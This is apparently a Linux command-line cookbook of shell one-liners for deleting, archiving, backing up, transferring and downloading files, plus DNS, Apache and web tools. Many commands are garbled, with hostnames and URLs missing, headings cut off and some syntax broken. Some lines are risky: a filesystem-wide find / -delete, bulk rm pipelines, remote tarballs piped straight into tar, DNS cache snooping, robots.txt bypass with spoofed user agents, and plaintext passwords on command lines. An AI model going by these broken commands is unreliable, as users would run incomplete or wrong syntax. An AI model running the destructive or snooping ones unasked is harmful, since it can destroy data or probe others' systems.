 ls -1 |grep -v .jpg |xargs rm

take a look at what a command will do before doing it

 find /tmp -type f -printf 'rm "%p";\n'

empty the trash folder

 alias trash="rm -fr ~/.local/share/Trash"

may be the optimal way of deleting huge numbers of files

 find /path/to/dir -type f -delete

Verbosely delete files matching specific name pattern, older than x

 find /backup/directory -name "some*" -mtime +15 | xargs rm -vf

Watch how fast the files in a drive are being deleted

 watch "df | grep /path/to/drive"

Remove a file whose name begins with a dash ( - ) character

 rm ./-filename

Erase empty files

 find . -size 0 -print0 | xargs -0 rm

Delete files older than 5 (days?)

 find /dir_name -mtime +5 -exec rm {} \

remove files and directories which havent been accessed in the last 20 minutes

 find -amin +20 -delete

remove all files with the extension ".dvi" and ".log"

 rm *.{dvi,log}

Remove all but the 5 most recent file in a directory.

 rm `ls -t | awk 'NR>5'`    the old bash syntax
 rm $(ls -t | awk 'NR>5')   the same, but new syntax

securely erase unused blocks in a partition

 # cd $partition; dd if=/dev/zero of=ShredUnusedBlocks bs=512M; shred -vzu ShredUnusedBlocks

Copying Files ‹↑›

copy lots of files from the current folder to the folder "img"

 find . -name "*" | xargs -I {} cp {} img  may be faster than -exec
 find . -name "*" -exec cp "{}" img \;
"cp * img/" may give the result: file list too longfind with "-exec" is much much faster than a "for" loop

A rather slow "for" loop for copying files

 for i in *; do cp $i img/; done

Symbolic Links To Files ‹↑›

make a symbolic link to the mounted hard drive in the home folder

 ln -s /mnt/hda1 ~/disk
 ln -s /path/to/original /path/to/link      general format

make a link to '.bashrc' in the current folder.

 ln -s ~/.bashrc  the symbolic link will be calledd 'bashrc'

delete a symbolic link

 rm link         the original file is not deleted

see where a symbolic link points to

 ls -l link

File Compression ‹↑›

Create a tar archive using 7z compression

 tar cf - /path/to/data | 7z a -si archivename.tar.7z

backup and remove files with access time older than 5 days.

 tar -zcvpf backup_`date +"%Y%m%d_%H%M%S"`.tar.gz `find <target> -atime

Extract a remote tarball in the current directory without having

 curl | tar zxvf -

Extract tarball from internet without local saving

 wget -O - | tar xz

Gzip files older than 10 days matching *

 find . -type f -name "*" -mtime +10 -print -exec gzip {} \;

Zip all subdirectories into zipfiles

 for f in `find . \( ! -name . -prune \) -type d -print`; do zip $ $f; done

Pack up some files into a tarball on a remote server without

 tar -czf - * | ssh "cat > files.tar.gz"

backup a directory in a timestamped tar.gz

 tar -czvvf backup$(date "+%Y%m%d_%H%M%S").tar.gz /path/to/dir

Create a tar.gz in a single command

 tar cvf - foodir | gzip > foo.tar.gz

Extract tar.gz in a single command

 gunzip < foo.tar.gz | tar xvf -

Create a zip file ignoring .svn files

 zip -r DIR -x "*/.svn/*"

 unzip -lt | grep testing | awk '{print $2}' | xargs rm -r

Remove all files previously extracted from a tar(.gz) file.

 tar -tf <file.tar.gz> | xargs rm -r

List contents of tar archive within a compressed 7zip archive

 7z x -so testfile.tar.7z | tar tvf -

Extract neatly a rar compressed file

 unrar e file.part1.rar; if [ $? -eq 0 ]; then rm file.part*.rar; fi

Compare an archive with the file-system

 tar dfz horde-webmail-1.2.3.tar.gz

compress a file and watch the progress

 tar zcf - user | pv /bin/gzip > /tmp/backup.tar.gz

Create a self-extracting archive for win32 using 7-zip

 7z -sfx archive.exe /path/to/archive

Compression formats Benchmark

 for a in bzip2 lzma gzip;do echo -n>$a;for b in $(seq 0 256);do dd if=/dev/zero of=$ bs=$b count=1;c=$(date +%s%N);$a $;d=$(date +%s%N);total=$(echo $d-$c|bc);echo $total>>$a;rm $ *.bz2 *.lzma *.gz;done;done

list the contents of a .gz compressed tar archive file

 tar ztvf file.tar.gz   nothing is uncompressed or extracted

list the contents of a .bz2 compressed tar archivve file

 tar jtvf file.tar.bz2

compress stuff and show a progress bar while it is working

 tar zcf - user | pv /bin/gzip > /tmp/backup.tar.gz

uncompress a ".bz2" compressed file

 bunzip2 filename.txt.bz2

for files ending with ".Z" use "uncompress"

 uncompress file.Z

view the contents of the compressed file 'comp.gz'

 zcat comp.gz

page through the contents of a compressed file

 zless filename

compress a file as small as possible with gzip

 gzip --best file

browse a compressed directory

 mc      the gnu midnight commander, uses 'curses'

create a compressed archive of the folder 'dir' in file 'dir.tar.gz'

 tar -cvz --exclude *.exe -f dir.tar.gz dir
excludes all filenames ending with '.exe'

Compress files found with find

 find ~/bin/ -name "*sh" -print0 | xargs -0t tar -zcvf foofile.tar.gz

Create a zip archive excluding all SVN folders

 zip -r * -x \*.svn\*

Archives Of Files ‹↑›

A file archive is a way to combine many different files within one file, optionally compressing (reducing the size) of each file included in the "archive" file. The purpose of creating file archives is to facilitate making backups of files or for transfering files from one computer to another.

Compress archive(s) or directory(ies) and split the output file

 rar a -m5 -v5M -R myarchive.rar /home/

Split a tarball into multiple parts

 tar cf - <dir>|split -b<max_size>M - <name>.tar.

Unrar all files in a directory

 for f in *.rar;do unrar e ?$f?;done

Tar - Compress by excluding folders

 tar -cvzf arch.tgz $(find /path/dir -not -type d)

Extract tarball from internet without local saving

 curl | tar xz

Slightly better compressed archives

 find . \! -type d | rev | sort | rev | tar c --files-from=- --format=ustar | bzip2 --best > a.tar.bz2

Archive a directory with datestamp on filename

 tar zcvf somedir-$(date +%Y%m%d-%H%M).tar.gz somedir/

display the files contained in the "tar" archive file "archive.tar"

 tar tvf archive.tar
the 'v' option prints each file which is added to the archive

append files with names ending in ".txt" to the archive file "text.tar"

 tar rvfn text.tar *.txt
 tar -rvfn text.tar *.txt   this is the same, the "-" is optional

create an archive file "new.tar" and append all "c" source files to it

 tar -cvf new.tar *.c
 tar cvf new.tar *.c        the same

create an archive file "new.tar" of the folder /etc/lynx

 tar cvvf new.tar /etc/lynx  "vv" means "extra verbosity"

extract all files from a "tar" archive file

 tar xvf myfile.tar

Backups Of Data And Disks ‹↑›

A backup is essentially a copy of data which is stored in a different place from the original data, and which hopefully will combat the laws of entropy.

File Backups ‹↑›

On unix-style systems, backup files have traditionally had a '~' extension.

add a backup (or any other) suffix to the file 'data'

 mv -vi data{,~}

Create a quick back-up copy of a file

 cp file.txt{,.bak}

Create a backup of the file 'fo/list' with todays timestamp

 cp fo/list{,-$(date +%Y-%m-%d)}

quickly backup or copy a file 'list.txt' with bash

 cp -bfS.bak list.txt list.txt

remove backup files (with the '~' extension)

 find / -name *~ -delete
 locate '*~' | xargs rm    faster but not as thorough

never rewrite a file while copying (or moving)

 cp --backup=t source.file target.file

a function to create backups with a day-time timestamp

 backup() { for i in "$@"; do cp -va $i $i.$(date +%Y%m%d-%H%M%S); done }

Folder Backups ‹↑›

backup directory. (for bash)

 cp -pr directory-you-want-to-backup{,_`date +%Y%m%d`} # for bash

create a separate backup file for all files in current folder

 find . -maxdepth 1 -type f -print0 | xargs -0 -i cp ./{}{,.bak}

Remote Backups ‹↑›

Backup a filesystem to a remote machine and use cstream to

 nice -n19 dump -0af - /<filesystem> -z9|gpg -e -r <gpg key id>|cstream -v 1 -t 60k|ssh <user@host> "cat > backup.img"

Send a backup job to a remote tape drive on another machine over ssh

 tar cvzf - /directory/ | ssh root@host "cat > /dev/nst0"

backup and synchronize entire remote folder locally (curlftpfs and

 curlftpfs ftp://username:password@ftpserver /tmp/remote-website/ && rsync -av /tmp/remote-website/* /usr/local/data_latest && umount /tmp/remote-website

Disk Backups ‹↑›

check the status of 'dd' in progress

 watch -n 10 killall -USR1 dd

Backup of a partition

 cd /mnt/old && tar cvf - . | ( cd /mnt/new && tar xvf - )

make a backup of an entire hard disk (the first one), saving to a file

  dd if=/dev/hda of=/path/to/image/file

make a backup of the second hard disk, compress it and write to a file

 dd if=/dev/hdb | gzip > /path/to/image.gz

restore a backup of the hard disk /dev/hdb

 dd if=/path/to/image of=/dev/hdb

restore a compressed backup of a hard disk

 gzip -dc /path/to/image.gz | dd of=/dev/hda

create a backup of the master boot record and partition table of the 'hdb' disk

 dd if=/dev/hdb of=/path/to/image count=1 bs=512

Restoring A Backup ‹↑›

Restore a local drive from the image on remote host via ssh

 ssh user@server 'dd if=sda.img' | dd of=/dev/sda

Transfering Files ‹↑›

A wide range of programs are available to transfer files between different computers on a network, and each has its own particular speciality

tools for copying files
cp - the standard unix copy tool
rsync - copy files across the network
install - copies files and sets the permissions

share files through the http port 80

 nc -w 5 -v -l -p 80 < file.ext

transfer files using commands in 'ftp.txt' to

 sftp -bc -pw password -l username -b ftp.txt

copy a file over the secure shell 'ssh' without 'scp'


share the current directory tree (via http) at http://$HOSTNAME:8000/

 python -m SimpleHTTPServer

Scp ‹↑›

The secure copy program is allegedly faster than 'sftp' mode, and uses ssh encryption. For transfering entire folders the 'rsync' program should probably used instead. Scp appears incapable of transfering 2 different files to 2 different folders. For that, see sftp. Without the '-r' switch Scp wont transfer folders.

transfer 'book.txt' to the books folder of a sourceforge site server

 scp books.txt user,

upload files 'f' and 'g' into the webfolder on a sourceforge server

 scp f g user,

download files 'f' and 'g' from a sourceforge server to this folder

 scp user,"htdocs/f htdocs/g" .

upload (overwriting) all files in the current folder to the folder 'doc/books/' to the 'eva' account on the server ''

 scp *

upload and overwrite all '.txt' files to the 'doc/' folder on

 scp *.txt

scp a good script from host A which has no public access to host

 cat nicescript |ssh middlehost "cat | ssh -a root@securehost 'cat > nicescript'"

bash function to upload a file via scp to the 'rpike' a/c on the server

 upfile() { scp $1$1 }

Easily scp a file back to the host you're connecting from

 mecp () { scp "$@" ${SSH_CLIENT%% *}:Desktop/; }

download 2 files from the server using the account 'user'

 scp"chap1.txt chap2.txt" ~/books

upload the 'books' folder to the server '' with account 'bob'

 scp -r ~/logs   consider using rsync instead

download all the files in the 'books' folder to the current local folder

 scp* .   no subfolders are downloaded

copy the file 'file.txt' from the '' host to the ''


scp file from hostb to hostc while logged into hosta

 scp user@hostb:file user@hostc:

Complex Scp ‹↑›

create a list of file names from local folders

 d=$(echo ~/sf/htdocs/books/*/); d="basename "${d// /;basename }; d=$(eval $d); d=$(echo $d | sed -r 's:[a-z-]+:htdocs/books/&/&-book.txt:ig'); echo $d

create a list of file names from local folders and download them

 d=$(echo ~/sf/htdocs/books/*/); d="basename "${d// /;basename }; d=$(eval $d); d=$(echo $d | sed -r 's:[a-z-]+:htdocs/books/&/&-book.txt:ig');  echo $d; scp user,"$d" .

Sftp ‹↑›

sftp transfers files using the encrypted ssh (secure shell) protocol and is thus 'safer' and more modern than 'ftp'. sftp is designed to be used interactively by the user, but can also run in batch mode with the -b switch

using sftp in batch mode to upload to the sourceforge web server

 sftp -b a.txt user, > /tmp/sftp.log
 the file 'a.txt' contains 'cd books; put chap1.txt; bye;'

Rsync ‹↑›

Rsync is a very powerful network file copying program. It is particularly nice because it only transfers the parts of the files which have changed (the 'difference' to the old files). This saves a great deal of bandwidth and is probably the most efficient and pleasant way to develop a website. It is a program with a very large number of options to fine tune the way the file transfers take place.

Note: If the source path ends with "/" then the contents of the folder are copied but the folder itself is not

remote file transfer programs
ftp unencrypted file transfer (older)
sftp encrypted file transfer with user interaction
scp encrypted file transfer, non-interactive (faster than sftp)
wget http recursive file download, suitable for a bad connection
curl like wget but with some more options
rsync an efficient and flexible remote copy program
bittorent distributed file transfer

create an incremental backup of a directory using hard links

 rsync -a --delete --link-dest=../lastbackup $folder $dname/

Simple Usage Of Rsync ‹↑›

the general form of rsync is

 rsync [options] source destination

download files from folder 'path' on the server to a local folder

   rsync -avP /local/folder/                    
   rsync -avP -e ssh /local/folder/ ##(using ssh) 
     -a archive mode
     -P keep partially transfered files, and show progress
        during the transfer of files

copy recursively all files and folders from src/bar to /data/tmp/bar

 rsync -avz machine:src/bar /data/tmp
note that a new directory "bar" may be created within '/data/tmp'

copy recursively all files and folders from src/bar/ to /data/tmp

 rsync -avz foo:src/bar/ /data/tmp

Note that NO directory "/data/tmp/bar" will be created

rsync tools
grsync - a very basic graphical version of rsync with gtk
-g preserve the group information of the files (where possible) -o preserve file owner information -D preserve device and special files (where possible) -z compress file data during the transfer

copy all files from the current folder to "htdocs/books/" on the server

 rsync -rv --exclude=*.swp . user@server:htdocs/books/

The contents of the current folder are copied but not the folder itself. Files with names ending in '.swp' are not copied because of the --exclude option.

Remote copy directories and files through an SSH tunnel host

 rsync -avz -e 'ssh -A sshproxy ssh' srcdir remhost:dest/path/

copy files displaying a progress bar.

 rsync -av --progress ./file.txt user@host:/path/to/dir

rsync + find

 find . -name "whatever.*" -print0 | rsync -av --files-from=- --from0 ./ ./destination/

Local Copying ‹↑›

Instead of using 'cp' one may use rsync instead to copy and synchronise large folders. This has the advantage that not all the files need be copied, only those that have changed.

synchronise the users 'web' folder with a folder on a usb key

 rsync -r ~/web/ /media/KINGSTON/web/
 rsync -r ~/web/ /media/KINGSTON/web   the same
 rsync -r ~/web /media/KINGSTON/       the same
 rsync -rv ~/web/ /media/KINGSTON/web  the same, but verbose
 rsync -rvn ~/web/ /media/KINGSTON/web/ just see what would happen

The trailing '/' on ~/web/ is important since it determined whether rsync will copy just the contents of the folder or the folder itself.

copy the folder 'big' from the current folder to the '/home/user/' folder

 rsync -r big /home/user/
 cp -r big /home/user/  this is more or less the same

copy the folder 'big' to the users home folder exclude 'iso' files

 rsync -rv --progress --exclude=*.iso big ~/  progress is shown

Excluding Files From Rsync Transfers ‹↑›

upload files excluding the directory 'images'

 rsync -r --exclude='images' /local/dir/

The local folder /local/dir/images is not uploaded to the remote computer (

synchronise by uploading all files except 'png' & 'jpg' images

 rsync -r --exclude=*.png --exclude=*.jpg /local/dir/

upload all files except 'pdf' documents and the /local/dir/images folder

 rsync -r --exclude=*.pdf --exclude=images /local/dir/

upload files excluding everthing listed in the file '/path/list.txt'

 rsync --exclude-from '/path/list.txt' /local/dir/
an absolute path for the exclude file seems to be necessary, 2008

try bittorent.

Problems ‹↑›

There seems to be no short option for --exclude. It also seems imposible to include a list of files with one --exclude option

Deleting Destination Files With Rsync ‹↑›

see what files would be deleted with the "--delete" option

 rsync -rnv --delete /home/user/ user@server:path/
 rsync -rv --delete --dry-run /home/user/ user@server:path/   the same
this should always be done before using "--delete"

recursively upload the contents of /home/ and delete destination files not found in the source folder tree (this can be dangerous!, first use "-n")

 rsync -r --delete /home/ user@server:path/

upload files TO a server from a local folder using rsync and ssh upload the '/home/' folder except c files, deleting c files at the destination

 rsync -rv --delete-excluded --exclude=*.c /home/ user@server:path/

upload recursively the current directory excluding the folder "tree" and deleting the folder "tree" at the destination

 rsync -rv --delete-excluded --exclude=tree  . user@machine:/books/web

 rsync -avP -e ssh /local/folder/

copy all files from the "/home/user/" folder to path/ on the server

 rsync -e ssh /home/user/*
this is not a recursive copy; folders are not copied; the shell handles "*"

Symbolic Links And Rsync ‹↑›

upload files, copying the target of symbolic links

 rsync -rv --copy-links /local/folder/
 rsync -rvL /local/folder/ the same

Sourceforge ‹↑›

see what a sourceforge download with rsync would do without doing anything

 rsync -rvn -e ssh user, ~/work/htdocs'

upload to an sf project folder excluding vim swap files

 rsync -rv --exclude='*.swp' -e ssh ~/sf/htdocs/books user,'
if it doesnt exist, the 'books' folder is created on the server

get a project web-folder from sourceforge showing progress

 rsync -r --progress -e ssh user, ~/work/htdocs'

Uploading Files ‹↑›

use rsync, sftp, ftp,

Downloading Files ‹↑›

Downloading refers to the process of transfering files from a remote computer (somewhere on the internet, or just in the next room) to the the computer on which you are working.

Tools: wget, curl

Wget has the advantage that it works on slow and precarious internet connections and can be scripted and scheduled. Curl is very similar to wget but provides a few extra features.

snarf is a command line resource grabber.


Download an entire ftp directory using wget

 wget -r

Download from Rapidshare Premium using wget - Part 2

 wget -c -t 1 --load-cookies ~/.cookies/rapidshare <URL>

mirror a yahoo geocities site, accepting only txt, html ... etc

 wget -nH -m -Atxt,html,js,java,class,css -Isitename

resume downloading a file from the internet

 wget -c url    wget automatically retries getting

download a file limiting the download rate to 20k/second

 wget --limit-rate=20k url
this prevents wget hogging the available network bandwidth

get all the URLS contained in the file "list.txt"

 wget -i list.txt

download the html file and save it to the folder "tree"

 wget -P"tree"

download all ".gif" files from a web folder

 wget -r -l1 --no-parent -A.gif http://host/folder/

mirror a website without overwriting any existing local files

 wget -nc -r

Download an entire website

 wget --random-wait -r -p -e robots=off -U mozilla

download a file and output to standard output

 wget -O -

get all the pages linked to by the page "links.html"

 wget -O - http://host/links.html | wget --force-html -i

check the validity of links in the file bookmarks.html

 wget --spider --force-html -i bookmarks.html

mirror the site, with 3 retries logging errors in 'mirror.log'

 wget -m -t3 -o mirror.log

use wget but pretend to be the "Konqueror" browser

 wget --user-agent="Mozilla/5.0 (compatible; Konqueror/4.2; Linux) KHTML/4.2.98 (like Gecko)"
some sites may block access to wget to reduce server load

pretend to be the "Lynx" text mode browser

 wget -U "Lynx/2.8.7dev.9 libwww-FM/2.14" http://site

download free ebooks from

  # pretends to be firefox, recurses to 2 levels
  wget -erobots=off --user-agent="Mozilla/5.0 (X11; U; Linux i686; en-US; rv: Gecko/2008092416 Firefox/3.0.3" -H -r -l2 --max-redirect=1 -w 5 --random-wait -PmyBooksFolder -nd --no-parent -A.pdf

Using Curl ‹↑›

The curl utility is very similar to 'wget' but provides a few extra tricks.

HTTP Get of a web page via proxy server with login credentials

 curl -U username[:password] -x proxyserverIP:proxyserverPort webpageURI

get a file while pretending to be netscape 4.73 browser

 curl -A "Mozilla/4.73 [en] (X11; U; Linux 2.2.15 i686)" [URL]

follow http redirects (where the page is automatically refreshed to another)

 curl -L

use url 'globbing' to get several pages

 curl http://site.{one,two,three}.com

use arithmetic 'globbing' of urls to retrieve lots of pages

this will retrieve file1.txt, file2.txt, file3.txt ...
this will retrieve file001.txt, file002.txt, ... file099.txt, file100.txt

specify an alphabetic sequence of urls to retrieve

 curl[a-g].html  will get a.html, b.html, ... g.html

various sequences can be include to get lots of files


specify a sequence of urls to retrieve with a 'step' value (since 7.15.1)

 curl[1-100:10].txt gets 1.txt, 11.txt, 21.txt ...

access a page which is protected by basic authentication

 curl -u name:password

get the files a.html, b.html, c.html and save them with their names

 curl -O[a-c].html

get a.txt, r.txt and s.txt and save them in a file called dump.txt

 curl -o dump.txt{a,r,s}.txt

get all the pages of the linux cookbook pretending to be mozilla

 curl -A "Mozilla/4.0" -O[1-45].html
 for i in $(seq 1 45); do curl -A "Mozilla/4.0" -O$i.html; sleep 2; done  the same, but sleeping 2 seconds

download the linux cookbook, and convert to text at the same time

 for i in $(seq 1 45); do lynx --dump$i.html > cookbook-$i.txt; sleep 2; done

Mirroring ‹↑›

Create a mirror of a local folder, on a remote server

 rsync -e "/usr/bin/ssh -p22" -a --progress --stats --delete -l -z -v -r -p /root/files/ user@remote_server:/root/files/

Developing Software ‹↑›

Cpp ‹↑›

Add a newline to the end of a cpp file

 find . -iname "*.cpp" -exec perl -ni -e 'chomp; print "$_\n"' {} \;

Create etags file of .c, .cpp, and .h files in all subdirectories

 find . -regex ".*\.[cChH]\(pp\)?" -print | etags -

display typedefs, structs, unions and functions provided by a library

 cpp /usr/include/stdio.h | grep -v '^#' | grep -v '^$' | less
Display GCC Predefined Macros
 gcc -dM -E - <<<''

Show Shared Library Mappings

 ldconfig -p

Colorize make, gcc, and diff output

 colormake, colorgcc, colordiff

Write and run a quick C program

 cat | gcc -x c -o a.out - && ./a.out && rm a.out

make a patch file using an original file and a modification

 diff -u file.txt.orig file.txt > file.txt.patch

compile an application

 ./configure; make && make install   use 'sudo' where necessary

Display a list of code committers sorted by the frequency of commits

 svn log -q|grep "|"|awk "{print \$3}"|sort|uniq -c|sort -nr

List all authors of a particular git project

 git log --format='%aN' | sort -u

Figure out your work output for the day

 git diff --stat `git log --author="XXXXX" --since="12 hours ago" --pretty=oneline | tail -n1 | cut -c1-40` HEAD

git diff of files that have been staged ie 'git add'ed

 git diff --cached

Remote Development ‹↑›

detach remote console for long running operations

 dtach -c /tmp/wires-mc mc

Execute a sudo command remotely, without displaying the password

 stty -echo; ssh HOSTNAME "sudo some_command"; stty echo

How to run a command on a list of remote servers read from a file

 dsh -M -c -f servers -- "command HERE"

connect to X login screen via vnc

 x11vnc -display :0 -auth $(ps -ef|awk '/xauth/ {print $15}'|head -1) -forever -bg &

Share your terminal session (remotely or whatever)

 screen -x

cvs, subversion

Use a Gmail virtual disk (GmailFS) on Ubuntu

 mount.gmailfs none /mount/path/ [-o username=USERNAME[,password=PASSWORD][,fsname=VOLUME]] [-p]

Ldap ‹↑›

LDAP search to query an ActiveDirectory server

 ldapsearch -LLL -H ldap:// -b 'dc=example,dc=com' -D 'DOMAIN\Joe.Bloggs' -w 'p@ssw0rd' '(sAMAccountName=joe.bloggs)'

decoding Active Directory date format

 ldapsearch -v -H ldap://<server> -x -D cn=<johndoe>,cn=<users>,dc=<ourdomain>,dc=<tld> -w<secret> -b ou=<lazystaff>,dc=<ourdomain>,dc=<tld> -s sub sAMAccountName=* '*' | perl -pne 's/(\d{11})\d{7}/"DATE-AD(".scalar(localtime($1-11644473600)).")"/e'

Dns The Domain Name System ‹↑›

resolve hostname to IP our vice versa with less output

 resolveip -s

Determine what version of bind is running on a dns server.

 dig -t txt -c chaos VERSION.BIND @<>

flush cached dns lookups

 ipconfig /flushdns

Check version of DNS Server

 nslookup -q=txt -class=CHAOS version.bind NS.PHX5.NEARLYFREESPEECH.NET

gets the bare ip(s) of a domain

 dig | sed -nr 's/^[^;].*?\s([.0-9]{7,15})$/\1/ p'

Get MX records for a domain

 host -t mx

Reverse DNS lookups

 sed 's/\([0-9]*\)\.\([0-9]*\)\.\([0-9]*\)\.\([0-9]*\) domain name pointer\(.*\)\./\4.\3.\2.\1\5/' \ lookups.txt

DNS cache snooping

 for i in `cat names.txt`; do host -r $i [nameserver]; done

Check if a .no domain is available

 check_dns_no() { for i in $* ; do if `wget -O - -q$ | grep "no match" &>/dev/null` ; then echo $ "available" ; fi ; sleep 1 ;done }

Get your public ip using dyndns

 curl -s | grep -o "[[:digit:].]\+"

Get fully qualified domain names (FQDNs) for IP address with

 NAME=$(nslookup $IP | sed -n 's/.*arpa.*name = \(.*\)/\1/p'); test -z "$NAME" && NAME="NO_NAME"; echo "$NAME"

Get your external IP address if your machine has a DNS entry

 host $HOSTNAME|cut -d' ' -f4

Get your external IP address if your machine has a DNS entry


Perform a reverse DNS lookup

 dig -x

Get your public ip using dyndns

 curl -s ''

Check reverse DNS

 dig -x {IP}

Check reverse DNS

 dig +short -x {ip}

Update your OpenDNS network ip

 wget -q --user=<username> --password=<password> ' myip=your_ip' -O -

Update with your external IP.

 curl -v -k -u user:password "<your_domain_name_here> &myip=$(curl -s | sed 's/[a-zA-Z<>/ :]//g')&wildcard=NOCHG&mx=NOCHG&backmx=NOCHG"

Check reverse DNS

 host {checkIp or hostname} [dns server]

Get MX records for a domain

 dig mx +short

Short and sweet output from dig(1)

 alias ds='dig +noauthority +noadditional +noqr +nostats +noidentify +nocmd +noquestion +nocomments'

Get your external IP address if your machine has a DNS entry

 dig +short $HOSTNAME

List of reverse DNS records for a subnet

options used
-v verbose output
-a the "archive" mode which means the same as "-rlptgoD"
-r recurse into directories
-l copy symbolic links as symbolic links
-p preserve file permissions
-t preserve file timestamps

Reading Usenet News ‹↑›

read news using the server '' (for example)

 slrn -h

 nmap -R -sL | awk '{if($3=="not")print"("$2") no PTR";else print$3" is "$2}' | grep '('

Web Servers ‹↑›

set an HTTP redirect to listen on port 80

 while [ 0 ]; do echo -e "HTTP/1.1 302 Found\nLocation:" | nc -vvvv -l -p 80; done

Apache ‹↑›

Simple list of apache2 virtualhosts

 /usr/sbin/apache2ctl -S

Count how many times a certain referer appears in your apache log

 Q="reddit|digg"; F=*.log; awk -F\" '{print $4}' $F | egrep $Q | wc -l

Search for specific IPs taken from a text file within the apache

 grep -E ":(`cat bnd-ips.txt | sed 's/\./\\./g' | tr '\n' '|'`)" access.log

benchmark web server with apache benchmarking tool

 ab -n 9000 -c 900 localhost:8080/index.php

Analyse compressed Apache access logs for the most commonly

 zcat access_log.*.gz | awk '{print $7}' | sort | uniq -c | sort -n | tail -n 20

Who has the most Apache connections.

 netstat -anl | grep :80 | awk '{print $5}' | cut -d ":" -f 1 | uniq -c | sort -n | grep -c IPHERE

Summarize Apache Extended server-status to show longest running

 links --dump 1 http://localhost/server-status|grep ^[0-9]|awk 'BEGIN {print "Seconds, PID, State, IP, Domain, TYPE, URL\n--"} $4 !~ /[GCRK_.]/ {print $6, $2, $4, $11, $12, $13 " " $14|"sort -n"}'

grep apache access.log and list IP's by hits and date - sorted

 grep Mar/2009 /var/log/apache2/access.log | awk '{ print $1 }' | sort -n | uniq -c | sort -rn | head

show Apache memory usage

 ps auxf | grep httpd | grep -v grep | grep -v defunct | awk '{sum=sum+$6}; END {print sum/1024}'

How much RAM is Apache using?

 ps -o rss -C httpd | tail -n +2 | (sed 's/^/x+=/'; echo x) | bc

Know which modules are loaded on an Apache server

 apache2 -t -D DUMP_MODULES

Get list of all Apache Virtual Host and which is default for each

 httpd -S

web-serve files in the current folder tree accessible at http://$HOSTNAME:8000/

 python -m SimpleHTTPServer this is the simplest webserver setup

Top 10 requestors arranged by IP address from Apache/NCSA Logs

 awk '{print $1}' /var/log/httpd/access_log | sort | uniq -c | sort -rnk1 | head -n 10

Www The World Wide Web ‹↑›

view the urls in the file 'eg.txt'

 wget -Oeg.txt; urlview eg.txt

convert an html file into valid xml

 tidy -asxhtml -numeric < index.html > index.xml

rapidshare download script in 200 characters

 u=`curl -d 'dl.start=Free' $(curl $1|perl -wpi -e 's/^.*"(http:\/\/rs.*)" method.*$/$1/'|egrep '^http'|head -n1)|grep "Level(3) \#2"|perl -wpi -e 's/^.*(http:\/\/rs[^\\\\]*).*$/$1/'`;sleep 60;wget $u

Check your unread Gmail from the command line

 curl -u username:password --silent "" | tr -d '\n' | awk -F '<entry>' '{for (i=2; i<=NF; i++) {print $i}}' | sed -n "s/<title>\(.*\)<\/title.*name>\(.*\)<\/name>.*/\2 - \1/p"

Twitpic upload and Tweet

 curl --form username=from_twitter --form password=from_twitter --form media=@/path/to/image --form-string "message=tweet"

check site ssl certificate dates

 echo | openssl s_client -connect 2>/dev/null |openssl x509 -dates -noout

Parallel file downloading with wget

 wget -nv -O- | egrep -o "http://[^[:space:]]*.jpg" | xargs -P 10 -r -n 1 wget -nv

Search Google from the command line

 curl -A Mozilla |html2text -width 80

Log your internet download speed

 echo $(date +%s) > start-time; URL=; while true; do echo $(curl -L --w %{speed_download} -o/dev/null -s $URL) >> bps; sleep 10; done &

Check if a domain is available and get the answer in just one

 whois | grep match

count the appearance of a word or a string in a given webpage

 wget -q -O- PAGE_URL | grep -o 'WORD_OR_STRING' | wc -w

Creating shortened URLs from the command line

 curl -s<website.url>/ | sed -n 's/.*\(http:\/\/\/[a-z0-9][a-z0-9]*\).*/\1/p' | uniq

Manually Pause/Unpause Firefox Process with POSIX-Signals

 killall -STOP -m firefox

Extract all urls from the last firefox sessionstore.js file used.

 sed -e 's/{"url":/\n&/g' ~/.mozilla/firefox/*/sessionstore.js | cut -d\" -f4

Downloading From The Web ‹↑›

news reading programs
slrn in active development
alpine a mail and news program
mutt another mail and news program

Run remote web page, but don't save the results

 wget -O /dev/null

Comic Strips Online ‹↑›

View the newest xkcd comic.

 wget `lynx --dump|grep png`

display the 'dilbert' comic strip of the day

 display$(curl -s|grep -Po '"\K/dyn/str_strip(/0+){4}/.*strip.[^\.]*\.gif')

whois surfing my web ?

 watch lsof -i :80

Css Cascading Style Sheets ‹↑›

Awk one-liner that sorts a css file by selector

 awk '/.*{$/{s[$1]=z[$1]=j+0}{l[j++]=$0}END{asorti(s);for(v in s){while(l[z[s[v]]]!~/}$/)print l[z[s[v]]++];print"}"ORS}}'

Twitter ‹↑›

The microblogging website has become strangely popular.

Update twitter from command line without reveal your password

 curl -n -d status='Hello from cli'

Get your Tweets from the command line

 curl -s -u user:password '' | xmlstarlet sel -t -m '//status' -v 'user/screen_name' -o ': ' -v 'text' -n

Print trending topics on Twitter

 wget -O - --quiet | ruby -rubygems -e 'require "json";require "yaml"; puts YAML.dump(JSON.parse($stdin.gets))'

check if it is possible to connect to twitter

 wget -q -O -

another tweet function to view statuses

 tweet () { curl -u UserName -d status="$*"; }

speak the last 3 tweets on mac os

 curl -s -u user:password | grep title | sed -ne 's/<\/*title>//gp' | head -n 4 | say -v Bruce

send tweets to twitter (and get user details)

 curl --basic --user "user:pass" --data-ascii "status=tweeting%20from%20%the%20linux%20command%20line"

Update twitter via curl

 curl -u user:pass -d status="Tweeting from the shell"

Print trending topics on Twitter

 curl -s | awk -F'</?[^>]+>' '/\/intra\/trend\//{print $2}'

Print trending topics on Twitter

 curl --silent | sed -n '/div id=\"hot\"/,/div/p' | awk -F\> '{print $2}' | awk -F\< '{print $1}' | sed '/^$/d'

Firefox ‹↑›

The firefox browser is an important piece of software.

how to run firefox in safe mode from command line

 firefox --safe-mode

run the firefox profile manager (which manages default settings)

 firefox -no-remote -P

view what percentage of memory firefox is using

 ps -o %mem= -C firefox-bin | sed -s 's/\..*/%/'

Extract all urls from last firefox sessionstore

 perl -lne 'print for /url":"\K[^"]+/g' $(ls -t ~/.mozilla/firefox/*/sessionstore.js | sed q)

release firefox from a still running message

 rm ~/.mozilla/firefox/<profile_dir>/.parentlock

List recorded formular fields of Firefox incomplete??

 cd ~/.mozilla/firefox/ && sqlite3 $(cat profiles.ini | grep Path )

Cleanup firefox's database.

 find ~/Library/Application\ Support/Firefox/ -type f -name "*.sqlite" -exec sqlite3 {} VACUUM \;

Speed up launch of firefox

 find ~ -name '*.sqlite' -exec sqlite3 '{}' 'VACUUM;' \;

Graphical Web Browsers ‹↑›

web mirroring
httrack - more interactive than wget

Text Mode Web Surfing ‹↑›

Text-mode web surfing means using a program running from a 'console' 'terminal' or 'command-line' to view web-pages. This generally means that it is not possible to view the images contained in the web-pages, only the text. While this is aesthetically inferior, it is faster and sometimes more useful and less distracting.

some graphical browsers
